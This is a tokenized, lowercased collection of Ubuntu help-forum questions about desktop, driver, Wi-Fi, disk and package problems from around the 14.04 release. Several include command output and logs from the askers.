includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu saucy main deb-src http : //extras.ubuntu.com/ubuntu saucy main # deb-src http : //archive.canonical.com/ $ ( lsb_release -sc ) partner deb http : //in.archive.ubuntu.com/ubuntu/ saucy main universe restricted multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ saucy main universe restricted multiverse # added by software-properties deb http : //security.ubuntu.com/ubuntu/ saucy-security universe restricted multiverse main deb http : //in.archive.ubuntu.com/ubuntu/ saucy-updates universe restricted multiverse main deb http : //in.archive.ubuntu.com/ubuntu/ saucy-proposed universe restricted multiverse main deb http : //in.archive.ubuntu.com/ubuntu/ saucy-backports universe restricted multiverse main deb http : //archive.canonical.com/ trusty partner deb-src http : //archive.canonical.com/ trusty partner deb http : //archive.ubuntu.com/ubuntu trusty multiverse main universe restricted deb-src http : //archive.ubuntu.com/ubuntu trusty main restricted deb-src http : //archive.ubuntu.com/ubuntu trusty multiverse deb-src http : //archive.ubuntu.com/ubuntu trusty universe deb http : //archive.ubuntu.com/ubuntu trusty-backports universe main restricted multiverse deb-src http : //archive.ubuntu.com/ubuntu trusty-backports main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu trusty-security multiverse main universe restricted deb-src http : //archive.ubuntu.com/ubuntu trusty-security main restricted deb-src http : //archive.ubuntu.com/ubuntu trusty-security multiverse deb-src http : //archive.ubuntu.com/ubuntu trusty-security universe deb http : //archive.ubuntu.com/ubuntu trusty-updates multiverse main universe restricted deb-src http : //archive.ubuntu.com/ubuntu trusty-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu trusty-updates multiverse deb-src http : //archive.ubuntu.com/ubuntu trusty-updates universe deb http : //extras.ubuntu.com/ubuntu trusty main deb-src http : //extras.ubuntu.com/ubuntu trusty main deb-src http : //archive.canonical.com/ trusty partner deb-src http : //archive.ubuntu.com/ubuntu trusty main restricted deb-src http : //archive.ubuntu.com/ubuntu trusty multiverse deb-src http : //archive.ubuntu.com/ubuntu trusty universe deb-src http : //archive.ubuntu.com/ubuntu trusty-backports main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu trusty-security main restricted deb-src http : //archive.ubuntu.com/ubuntu trusty-security multiverse deb-src http : //archive.ubuntu.com/ubuntu trusty-security universe deb-src http : //archive.ubuntu.com/ubuntu trusty-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu trusty-updates multiverse deb-src http : //archive.ubuntu.com/ubuntu trusty-updates universe deb-src http : //extras.ubuntu.com/ubuntu trusty main
453124	gtk-message and warnings in ubuntu 14.04	since updating to ubuntu 14.04 i 've started getting this error message when running gnucash . gnucash says it has nothing to do with them and they suggested asking ubuntu for help . so can anyone help with this message : gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' ( npviewer.bin:18843 ) : gtk-warning ** : unable to locate theme engine in module_path : `` murrine '' , there is more of it , but it just repeats the same lines over and over again . i 've also found these error messages which might help someone find me a cure ! peter @ ubuntu : ~ $ strace gedit 2 > & 1 | grep can access ( `` /usr/lib/x86_64-linux-gnu/gtk-3.0/3.0.0/x86_64-pc-linux-gnu/modules/libcanberra-gtk-module.so '' , f_ok ) = -1 enoent ( no such file or directory ) access ( `` /usr/lib/x86_64-linux-gnu/gtk-3.0/3.0.0/x86_64-pc-linux-gnu/modules/libcanberra-gtk-module.la '' , f_ok ) = -1 enoent ( no such file or directory ) access ( `` /usr/lib/x86_64-linux-gnu/gtk-3.0/3.0.0/modules/libcanberra-gtk-module.so '' , f_ok ) = -1 enoent ( no such file or directory ) access ( `` /usr/lib/x86_64-linux-gnu/gtk-3.0/3.0.0/modules/libcanberra-gtk-module.la '' , f_ok ) = -1 enoent ( no such file or directory ) access ( `` /usr/lib/x86_64-linux-gnu/gtk-3.0/x86_64-pc-linux-gnu/modules/libcanberra-gtk-module.so '' , f_ok ) = -1 enoent ( no such file or directory ) access ( `` /usr/lib/x86_64-linux-gnu/gtk-3.0/x86_64-pc-linux-gnu/modules/libcanberra-gtk-module.la '' , f_ok ) = -1 enoent ( no such file or directory ) access ( `` /usr/lib/x86_64-linux-gnu/gtk-3.0/modules/libcanberra-gtk-module.so '' , f_ok ) = 0 stat ( `` /usr/lib/x86_64-linux-gnu/gtk-3.0/modules/libcanberra-gtk-module.so '' , { st_mode=s_ifreg|0644 , st_size=23112 , ... } ) = 0 open ( `` /usr/lib/x86_64-linux-gnu/gtk-3.0/modules/libcanberra-gtk-module.so '' , o_rdonly|o_cloexec ) = 10 open ( `` /usr/lib/x86_64-linux-gnu/gedit/libcanberra-gtk3.so.0 '' , o_rdonly|o_cloexec ) = -1 enoent ( no such file or directory ) open ( `` /usr/lib/x86_64-linux-gnu/libcanberra-gtk3.so.0 '' , o_rdonly|o_cloexec ) = 10 open ( `` /usr/lib/x86_64-linux-gnu/gedit/libcanberra.so.0 '' , o_rdonly|o_cloexec ) = -1 enoent ( no such file or directory ) open ( `` /usr/lib/x86_64-linux-gnu/libcanberra.so.0 '' , o_rdonly|o_cloexec ) = 10 writev ( 8 , [ { `` \22\0\17\0\205\0 @ \4p\1\0\0\33\1\0\0\10\0\0\0 ! \0\0\0/com/can '' ... , 176 } , { null , 0 } , { `` '' , 0 } ] , 3 ) = 176 open ( `` /usr/lib/x86_64-linux-gnu/libcanberra-0.30/libcanberra-pulse.la '' , o_rdonly ) = -1 enoent ( no such file or directory ) open ( `` /usr/lib/x86_64-linux-gnu/libcanberra-0.30/libcanberra-pulse.so '' , o_rdonly|o_cloexec ) = 15 peter @ ubuntu : ~ $
453125	how to get bose soundlink mini bluetooth working	i 've been struggling now for hours to setup my bluetooth audio connection to bose soundlink mini . i can add the device and pair it but when i try to connect via gui it always disconnects automatically . sometimes this last a couple of seconds but mostly only 1-2 seconds . sometimes i can hear a little beep on the audio device which normally indicates that a device is connected . i already tried to install blueman but i get the same problems . i also tried to connect via command line but i can not even detect the device with hcitool scan ( although he finds the device with the gui ) . i also reinstalled bluez and installed every possible package containing the name bluez in it because i thought it might be a missing package ... but no success . i 'm now under ubuntu 14.04 but i had the same trouble back with 13.04 and 13.10 although i got it working back then sometimes ( but mostly the same issue ) . any help on how to proceed/debug etc . would be appreciated !
453126	how can i remove launcher drive icons on 14.04 ?	non of the solutions work from these answers . do someone have any solution for the new , 14.04 release ? related question
453127	wifi connection problem	i just installed ubuntu 14.04 and when i'am connected with wifi i ca n't post or register on any site or forum there is no problem when iam using wired connection i 've got broadcom 43142
453130	btrfs raid5/6 understanding space usage and usability	im currently thinking about experimenting with btrfs with my workload in place of ext4 . right now i have a few drives on order . i want to setup btrfs on the first drive and slowly expand the fs spanning new drives as i need space . i know that btrfs has raid-like protection levels but its not actually raid in the traditional sense . i am familiar with filesystem design so feel free to give more technical answers . i want to know what my effective space utilization will be given a setup in raid 5 or 6 using 1,2,4 or 8 - 4tb drives . does mixing drive sizes affect space utilization , or leave you with un-used space ? how long does it take to rebuild a fs after a drive goes down ? either 2tb or 4tb estimates with modern processors ie 4th gen i5/7 or equivalent . in other words how safe is raid-5 in place of raid-6 . i plan on upgrading my 14.04 server to use the 3.14 kernel to get a reasonably new version of the btrfs driver . is the general consensus about the newest versions of btrfs ( 3.14+ ) that they are good for every day use ( my data is replaceable albeit not easy ) ? i 'm not planning on using it for my root partition but i ca n't sustain frequent kernel panics bringing the server offline . ( im referencing this page https : //btrfs.wiki.kernel.org/index.php/changelog ) what do people tend to suggest for meta-data protection levels , how much space does this take ? really any guidance would be helpful . i have been trying to educate myself a lot by reading the btrfs wiki and other sites but really want to dial in my understating before i venture down this path .
453134	pdf files are printed as blank pages .	i 'm trying to print a pdf file with document viewer . i get blank pages out of printer . when i hit print preview , i also see blank pages . images ( jpg ) are printed just fine . the problem appeared recently , i ca n't figure out what caused the problem . how i can make my printer print pdf ?
453135	system crash : empty /sys/class/backlight ( deleted acpi_video0 ) & now the error `` disk drive is not ready yet or present ''	i `` tried '' to set the default brightness for ubuntu 14.04 . following here , at first i did : echo 5 > /sys/class/backlight/acpi_video0/brightness then : sudo apt-get install xbacklight then copy-pasted below inside the terminal : sudo bash -c ' { echo `` # ! /bin/bash '' echo `` xbacklight =30 '' } > /etc/lightdm/display-setup-script.sh ' then : sudo chmod a+rx /etc/lightdm/display-setup-script.sh then : if grep ^display-setup-script /etc/lightdm/lightdm.conf ; then echo `` already a display-setup-script . it may already do what you need . else please adjust manually '' ; else sudo bash -c `` echo display-setup-script=/etc/lightdm/display-setup-script.sh > > /etc/lightdm/lightdm.conf '' ; fi then an error occured for the last one such that there 's not lightdm.conf ( i do n't understand why because i checked it later and it was there ! ) . so i removed `` display-setup-script.sh '' and even uninstalled xbacklight . but now inside /sys/class/backlight is empty whereas it should have a link `` acpi_video0 '' and another folder . after restarting the system , ubuntu wo n't boot properly and says `` the disk drive is not ready yet or present '' and gives the uuid ( the disk is an encrypted ssd ) . i would be thankful if anyone could tell me how to fix the system since i , idiotically , do n't have a backup ( and the backup for the decryption key as well ! ) p.s . my system is a lenovo thinkpad x230 , intel graphics card .
453137	ubuntu file system questions . ( efi partition , fat32 , vfat )	i just installed ubuntu 14.04 lts today , i found that the efi partition type showing on ubuntu is vfat , but i always heard the partition type for efi partition should be fat32 . i returned to windows 8.1 and seeing the paritition type for efi is fat 32 on it . so my questions are : what is vfat ? why is ubuntu showing the efi partition as vfat , while on windows 8.1 it is fat32 ? did ubuntu formatted the efi partion ? does this have any implication on windows 8.1 ?
453139	usb hard drive not displaying ubuntu	i have a 2tb verbatim usb 3 hard drive that was working fine one evening and not at all the next day . i can not view or mount the partitions . running `` lsusb '' shows that the hard drive is plugged in but the drive is not listed when i run `` sudo fdisk -l '' . it does n't show up under gparted or testdisk , but gnome-disks displays the drive indicating `` no media '' under volumes . the drive had 1 ntfs partition . windows 7 home premium shows the drive as uninitialized . i 'd like to restore the partition on the drive and recover the data .
453144	how do i get a irez k2 webcam working ?	when i run the lsusb - command , it shows the webcam . however , i ca n't get any picture or video on cheese . the same applies for any other webcam software on the ubuntu software center . here is the output of lsusb . the `` globalmedia '' one is my webcam : bus 001 device 002 : id 11aa:1520 globalmedia group , llc bus 002 device 002 : id 15d9:0a4c trust international b.v. usb+ps/2 optical mouse bus 004 device 002 : id 0e6a:6001 megawin technology co. , ltd gembird flexible keyboard kb-109f-b-de bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub p.s . iâm running ubuntu linux 12.04
453145	ubuntu 14.04 totem video player show big play/pause icon on screen	after i updated my desktop to 14.04 totem or unity default video player show it 's play/pause icon very big on the screen , and there is nothing in preferences that i can change it . any suggestions ?
453147	sudo add-apt-repository ppa : bumblebee/stable have no efekt	ubuntu 13.04 : sudo add-apt-repository ppa : bumblebee/stable have no effect after update sudo apt-get install bumblebee bumblebee-nvidia primus linux-headers-generic - > the packet ist not found sudo add-apt-repository ppa : bumblebee/stable enable the universe and multiverse repositories ( for bumblebee and nvidia packages respectively ) . sudo apt-get update install bumblebee using the default proprietary nvidia driver for 12.04 - 13.04 : sudo apt-get install bumblebee bumblebee-nvidia virtualgl linux-headers-generic and for 13.10 : sudo apt-get install bumblebee bumblebee-nvidia primus linux-headers-generic
453148	after upgrading to 14.04 my dropbox notifier is missing	reinstalling lippappindicator1 does n't help . i 'm using dropbox 1.6.1-1 . under 13.10 everything was fine . i 'm not sure whether syncing is working .
453149	harddrive not visible after update	yesterday i upgraded from 13.04 to 14 . during the installation , i left - when i came back ( a couple of hours later ) , it showed a black screen , nothing else . nothing happened for about an hour , so i restarted . now , when i try to boot my computer , it gives an error : no bootable device i can run ubuntu from a livecd , but i ca n't reinstall ubuntu . it does n't find my original hard drive , just the usb drive . similarly , if i try ubuntu from the usb-stick and run gparted , it only recognizes the usb , but the hard drive is not visible . anyone have any ideas how to get ubuntu to recognize my hard drive again ?
453150	14.04 & intel hd graphics : undefined symbol : drm_intel_get_reset_stats	i ca n't get hardware acceleration to work with intel hd graphics 5000 ( core i5/sandy bridge ) . it was working properly on 13.10 , but upgrade to 14.04 seems to have break something . there 's a problem while loading i965 driver : undefined symbol : drm_intel_get_reset_stats here 's full trace , with glxinfo . toilal @ nas : ~ $ libgl_debug=verbose glxinfo|grep renderer libgl : screen 0 does not appear to be dri3 capable libgl : pci id for fd 4 : 8086:0152 , driver i965 libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/tls/i965_dri.so libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/i965_dri.so libgl error : dlopen /usr/lib/x86_64-linux-gnu/dri/i965_dri.so failed ( /usr/lib/x86_64-linux-gnu/dri/i965_dri.so : undefined symbol : drm_intel_get_reset_stats ) libgl : opendriver : trying $ { origin } /dri/tls/i965_dri.so libgl : opendriver : trying $ { origin } /dri/i965_dri.so libgl error : dlopen $ { origin } /dri/i965_dri.so failed ( $ { origin } /dri/i965_dri.so : can not open shared object file : no such file or directory ) libgl : opendriver : trying /usr/lib/dri/tls/i965_dri.so libgl : opendriver : trying /usr/lib/dri/i965_dri.so libgl error : dlopen /usr/lib/dri/i965_dri.so failed ( /usr/lib/dri/i965_dri.so : can not open shared object file : no such file or directory ) libgl error : unable to load driver : i965_dri.so libgl error : driver pointer missing libgl error : failed to load driver : i965 libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so libgl : driver does not expose __dridrivergetextensions_swrast ( ) : /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so : undefined symbol : __dridrivergetextensions_swrast libgl : ca n't open configuration file /home/toilal/.drirc : no such file or directory . libgl : ca n't open configuration file /home/toilal/.drirc : no such file or directory . glx_mesa_multithread_makecurrent , glx_mesa_query_renderer , opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.4 , 256 bits )
453154	ca n't get anything from software center ( 12.04 )	everytime i try to get something from the software center , it fails along with the following : installarchives ( ) failed : extracting templates from packages : 50 % extracting templates from packages : 100 % preconfiguring packages ... extracting templates from packages : 50 % extracting templates from packages : 100 % preconfiguring packages ... extracting templates from packages : 50 % extracting templates from packages : 100 % preconfiguring packages ... extracting templates from packages : 50 % extracting templates from packages : 100 % preconfiguring packages ... error in function : any ideas on how to fix this ?
453155	why i can not open my disk please	i had windows & kali linux ( dual boot ) then i took off kali linux parition so i delete it but i made a mistake ... and pc wo n't boot `` rescue grub error '' or something ... but i installed ubuntu & removed windows and all . all is running fine but i just ca n't open one of my disks , this is the error : error mounting /dev/sdb5 at /media/imad/disque local : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb5 '' `` /media/imad/disque local '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sdb5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i asked this question before but no one had an idea , help please .
453156	wifi connection periodically dropping in centrino wireless-n 1030	as the title says , since upgrading to 14.04 , my wifi connection has been periodically hanging then dropping every 10min to hour . it will not reconnect unless i bring the adapter down and back up . so far i 've tried upgrading the firmware for the adapter , making sure power management is off . here is relevant stuff . thanks in advance for any help ! sudo lshw -c network *-network description : wireless interface product : centrino wireless-n 1030 [ rainbow peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:01:00.0 logical name : wlan0 version : 34 serial : 4c:80:93:87:4c : ae width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-24-generic firmware=18.168.6.1 ip=192.168.0.191 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:30 memory : d0600000-d0601fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 05 serial : 84:8f:69 : c3:99 : aa capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8101 driverversion=1.025.00-napi duplex=half latency=0 link=no multicast=yes port=twisted pair resources : irq:27 ioport:2000 ( size=256 ) memory : d0404000-d0404fff memory : d0400000-d0403fff iwconfig wlan0 wlan0 ieee 802.11bgn essid : '' thegreatbelow '' mode : managed frequency:2.447 ghz access point : 00:21:91 : e5 : cf:03 bit rate=6 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-35 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:954 missed beacon:0 dmesg | grep wlan0 [ 35.113583 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 35.120026 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 36.473871 ] wlan0 : authenticate with 00:21:91 : e5 : cf:03 [ 36.485339 ] wlan0 : send auth to 00:21:91 : e5 : cf:03 ( try 1/3 ) [ 36.491147 ] wlan0 : authenticated [ 36.493798 ] wlan0 : associate with 00:21:91 : e5 : cf:03 ( try 1/3 ) [ 36.497267 ] wlan0 : rx assocresp from 00:21:91 : e5 : cf:03 ( capab=0x431 status=0 aid=4 ) [ 36.503385 ] wlan0 : associated [ 36.503417 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 39.514131 ] wlan0 : deauthenticating from 00:21:91 : e5 : cf:03 by local choice ( reason=2 ) [ 39.535604 ] wlan0 : authenticate with 00:21:91 : e5 : cf:03 [ 39.545755 ] wlan0 : send auth to 00:21:91 : e5 : cf:03 ( try 1/3 ) [ 39.548952 ] wlan0 : authenticated [ 39.550071 ] wlan0 : associate with 00:21:91 : e5 : cf:03 ( try 1/3 ) [ 39.553836 ] wlan0 : rx assocresp from 00:21:91 : e5 : cf:03 ( capab=0x431 status=0 aid=4 ) [ 39.558780 ] wlan0 : associated [ 39.565815 ] wlan0 : deauthenticated from 00:21:91 : e5 : cf:03 ( reason : 9 ) [ 43.031072 ] wlan0 : authenticate with 00:21:91 : e5 : cf:03 [ 43.042810 ] wlan0 : send auth to 00:21:91 : e5 : cf:03 ( try 1/3 ) [ 43.045973 ] wlan0 : authenticated [ 43.046253 ] wlan0 : associate with 00:21:91 : e5 : cf:03 ( try 1/3 ) [ 43.049718 ] wlan0 : rx assocresp from 00:21:91 : e5 : cf:03 ( capab=0x431 status=0 aid=4 ) [ 43.053067 ] wlan0 : associated [ 152.697155 ] wlan0 : deauthenticated from 00:21:91 : e5 : cf:03 ( reason : 6 ) [ 152.760546 ] wlan0 : authenticate with 00:21:91 : e5 : cf:03 [ 152.770479 ] wlan0 : send auth to 00:21:91 : e5 : cf:03 ( try 1/3 ) [ 152.772431 ] wlan0 : authenticated [ 152.775826 ] wlan0 : associate with 00:21:91 : e5 : cf:03 ( try 1/3 ) [ 152.779294 ] wlan0 : rx assocresp from 00:21:91 : e5 : cf:03 ( capab=0x431 status=0 aid=4 ) [ 152.781909 ] wlan0 : associated [ 567.270184 ] wlan0 : deauthenticated from 00:21:91 : e5 : cf:03 ( reason : 4 ) [ 582.703100 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 590.271543 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 590.928532 ] wlan0 : authenticate with 00:21:91 : e5 : cf:03 [ 590.938915 ] wlan0 : send auth to 00:21:91 : e5 : cf:03 ( try 1/3 ) [ 590.941465 ] wlan0 : authenticated [ 590.942559 ] wlan0 : associate with 00:21:91 : e5 : cf:03 ( try 1/3 ) [ 590.945860 ] wlan0 : rx assocresp from 00:21:91 : e5 : cf:03 ( capab=0x431 status=0 aid=4 ) [ 590.948246 ] wlan0 : associated [ 590.948268 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 1538.574032 ] wlan0 : deauthenticated from 00:21:91 : e5 : cf:03 ( reason : 4 ) [ 1538.628557 ] wlan0 : authenticate with 00:21:91 : e5 : cf:03 [ 1538.638325 ] wlan0 : send auth to 00:21:91 : e5 : cf:03 ( try 1/3 ) [ 1538.640723 ] wlan0 : authenticated [ 1538.644710 ] wlan0 : associate with 00:21:91 : e5 : cf:03 ( try 1/3 ) [ 1538.648201 ] wlan0 : rx assocresp from 00:21:91 : e5 : cf:03 ( capab=0x431 status=0 aid=4 ) [ 1538.650911 ] wlan0 : associated [ 1807.559500 ] wlan0 : deauthenticated from 00:21:91 : e5 : cf:03 ( reason : 4 ) [ 1822.644903 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 1829.968446 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 1831.186853 ] wlan0 : authenticate with 00:21:91 : e5 : cf:03 [ 1831.198140 ] wlan0 : send auth to 00:21:91 : e5 : cf:03 ( try 1/3 ) [ 1831.200591 ] wlan0 : authenticated [ 1831.201847 ] wlan0 : associate with 00:21:91 : e5 : cf:03 ( try 1/3 ) [ 1831.206106 ] wlan0 : rx assocresp from 00:21:91 : e5 : cf:03 ( capab=0x431 status=0 aid=4 ) [ 1831.208359 ] wlan0 : associated [ 1831.208384 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 1831.216023 ] wlan0 : deauthenticating from 00:21:91 : e5 : cf:03 by local choice ( reason=2 ) [ 1831.226783 ] wlan0 : authenticate with 00:21:91 : e5 : cf:03 [ 1831.232283 ] wlan0 : send auth to 00:21:91 : e5 : cf:03 ( try 1/3 ) [ 1831.263123 ] wlan0 : authenticated [ 1831.265844 ] wlan0 : associate with 00:21:91 : e5 : cf:03 ( try 1/3 ) [ 1831.271737 ] wlan0 : rx assocresp from 00:21:91 : e5 : cf:03 ( capab=0x431 status=0 aid=4 ) [ 1831.273446 ] wlan0 : associated
453157	how to install teamviewer on 14.04 ?	i tried to install teamviewer 9 on ubuntu 14.04 , unsuccessfully . i 've downloaded the following extra ( raring ) packages : http : //archive.ubuntu.com/ubuntu/pool/universe/i/ia32-libs/ia32-libs-multiarch_20090808ubuntu36_i386.deb http : //archive.ubuntu.com/ubuntu/pool/universe/i/ia32-libs/ia32-libs_20090808ubuntu36_amd64.deb http : //archive.ubuntu.com/ubuntu/pool/main/a/alsa-lib/libasound2_1.0.25-4ubuntu3.1_i386.deb http : //archive.ubuntu.com/ubuntu/pool/main/a/alsa-lib/libasound2_1.0.25-4ubuntu3.1_amd64.deb http : //archive.ubuntu.com/ubuntu/pool/main/a/alsa-lib/lib32asound2_1.0.25-4ubuntu3.1_amd64.deb http : //www.teamviewer.com/en/download/linux.aspx but these errors were happened while i was installing the packages ( i 've also tried install with ubuntu 's software center , the same ) : $ sudo dpkg -i *.deb selecting previously unselected package ia32-libs . ( reading database ... 254553 files and directories currently installed . ) preparing to unpack ia32-libs_20090808ubuntu36_amd64.deb ... unpacking ia32-libs ( 20090808ubuntu36 ) ... selecting previously unselected package ia32-libs-multiarch . preparing to unpack ia32-libs-multiarch_20090808ubuntu36_i386.deb ... unpacking ia32-libs-multiarch ( 20090808ubuntu36 ) ... selecting previously unselected package lib32asound2 . preparing to unpack lib32asound2_1.0.25-4ubuntu3.1_amd64.deb ... unpacking lib32asound2 ( 1.0.25-4ubuntu3.1 ) ... dpkg : warning : downgrading libasound2 : amd64 from 1.0.27.2-3ubuntu7 to 1.0.25-4ubuntu3.1 preparing to unpack libasound2_1.0.25-4ubuntu3.1_amd64.deb ... de-configuring libasound2 : i386 ( 1.0.27.2-3ubuntu7 ) ... unpacking libasound2 : amd64 ( 1.0.25-4ubuntu3.1 ) over ( 1.0.27.2-3ubuntu7 ) ... replaced by files in installed package libasound2-data ( 1.0.27.2-3ubuntu7 ) ... dpkg : warning : downgrading libasound2 : i386 from 1.0.27.2-3ubuntu7 to 1.0.25-4ubuntu3.1 preparing to unpack libasound2_1.0.25-4ubuntu3.1_i386.deb ... unpacking libasound2 : i386 ( 1.0.25-4ubuntu3.1 ) over ( 1.0.27.2-3ubuntu7 ) ... replaced by files in installed package libasound2-data ( 1.0.27.2-3ubuntu7 ) ... selecting previously unselected package teamviewer . preparing to unpack teamviewer_linux_x64.deb ... unpacking teamviewer ( 9.0.27891 ) ... more than one copy of package libasound2 : i386 has been unpacked in this run ! only configuring it once . dpkg : dependency problems prevent configuration of ia32-libs-multiarch : ia32-libs-multiarch depends on bluez-alsa ; however : package bluez-alsa : i386 is not installed . ia32-libs-multiarch depends on libgettextpo0 ; however : package libgettextpo0 is not installed . ia32-libs-multiarch depends on gstreamer0.10-plugins-good ; however : package gstreamer0.10-plugins-good : i386 is not installed . ia32-libs-multiarch depends on gtk2-engines ; however : package gtk2-engines is not installed . ia32-libs-multiarch depends on gtk2-engines-murrine ; however : package gtk2-engines-murrine is not installed . ia32-libs-multiarch depends on gtk2-engines-pixbuf ; however : package gtk2-engines-pixbuf is not installed . ia32-libs-multiarch depends on gtk2-engines-oxygen ; however : package gtk2-engines-oxygen is not installed . ia32-libs-multiarch depends on ibus-gtk ; however : package ibus-gtk is not installed . ia32-libs-multiarch depends on libaio1 ; however : package libaio1 : i386 is not installed . ia32-libs-multiarch depen dpkg : error processing package ia32-libs-multiarch ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libasound2 : amd64 : libasound2-data ( 1.0.27.2-3ubuntu7 ) breaks libasound2 ( < < 1.0.27-4 ) and is installed . version of libasound2 : amd64 to be configured is 1.0.25-4ubuntu3.1 . dpkg : error processing package libasound2 : amd64 ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libasound2 : i386 : libasound2-data ( 1.0.27.2-3ubuntu7 ) breaks libasound2 ( < < 1.0.27-4 ) and is installed . version of libasound2 : i386 to be configured is 1.0.25-4ubuntu3.1 . dpkg : error processing package libasound2 : i386 ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of ia32-libs : ia32-libs depends on ia32-libs-multiarch ; however : package ia32-libs-multiarch is not configured yet . dpkg : error processing package ia32-libs ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of lib32asound2 : lib32asound2 depends on libasound2 ( = 1.0.25-4ubuntu3.1 ) ; however : package libasound2 : amd64 is not configured yet . dpkg : error processing package lib32asound2 ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of teamviewer : teamviewer depends on lib32asound2 ; however : package lib32asound2 is not configured yet . teamviewer depends on ia32-libs ; however : package ia32-libs is not configured yet . dpkg : error processing package teamviewer ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : ia32-libs-multiarch libasound2 : amd64 libasound2 : i386 ia32-libs lib32asound2 teamviewer do someone know how to install the teamviewer on 14.04 ?
453158	samba share opens in gedit rather than nautilus	i have setup a samba share on my raspberry pi and i think it 's working and setup fine as i can reach all the files with a krusader file manager . however when i try to open the shared folder with the default ubuntu file manager nautilus it tries and fails to open with gedit . could it be something with how ubuntu is setup to open samba shared folders ? does anyone know how i can fix this ? i 'm using ubuntu 14.04 if it matters .
453159	adding module to boot module list	what is the exact command for adding b43 module to the startup module list ? i have tried adding b43 to the end of /etc/modules and receive a message of access denied . in order to have wireless turn after reboot i have to use command sudo modprobe b43 .
453165	unable to initialize 5th generation ipod touch on gtkpod or rythmbox	running ubuntu 14.04 lts cant add music to brand new ipod touch 5th gen 16 gb is ipod touch model `` me643ll/a '' not supported by either gtkpod or rythmbox ? when i run gtk ipod manager a message immediately pops up saying `` ipod directory structure not found '' so i click `` create directory structure '' , then it asks for my model , which isnt present in the list . when i run rhythmbox it immediately asks if id like to initialize my ipod but the model drop down menu is greyed out and nothing happens when i click the initialize button i think my inability to initialize with these apps is stopping me from adding music to my device .
453166	newbie xubuntu with kde no wireless	newbie ( to here ) help requested . i currently run xubuntu ( just upgraded to 14.04 ) and have no issues . thought i would try kde , just for a change . running on a laptop with enough grunt for that , i just like the xfce environment . i installed kde with : sudo apt-get install kde-plasma-desktop this worked ok . i logged in and the look and feel are different but may be worth moving to . however , some basic functions are missing , like being able to enable wireless and log onto a wireless network . no icon for wireless , no settings in any of the control panels , no response to knetworkmanager ( could not be found with an apt-cache search knetworkmanager either . i tried to install wicd but this would not initialise and failed each login .
453171	ca n't type ' or `` on my macbook air	i just bought a macbook air and installed the ubuntu font . when i use ubuntu in iwork it will not recognize ' or `` ... i get either a 8 or 9 instead of `` or ' ... what can i do ?
453178	ubuntu 14.04 soft lockup on vostro 3500	i installed ubuntu 14.04 from cd without third party package and without internet connection on a vostro 3500 . after installation and reboot , my machine is kind of frozen and when i switch to tty1 i see a bunch of soft lockup cpu waits for ... does anyone know how to fix this ? thank you
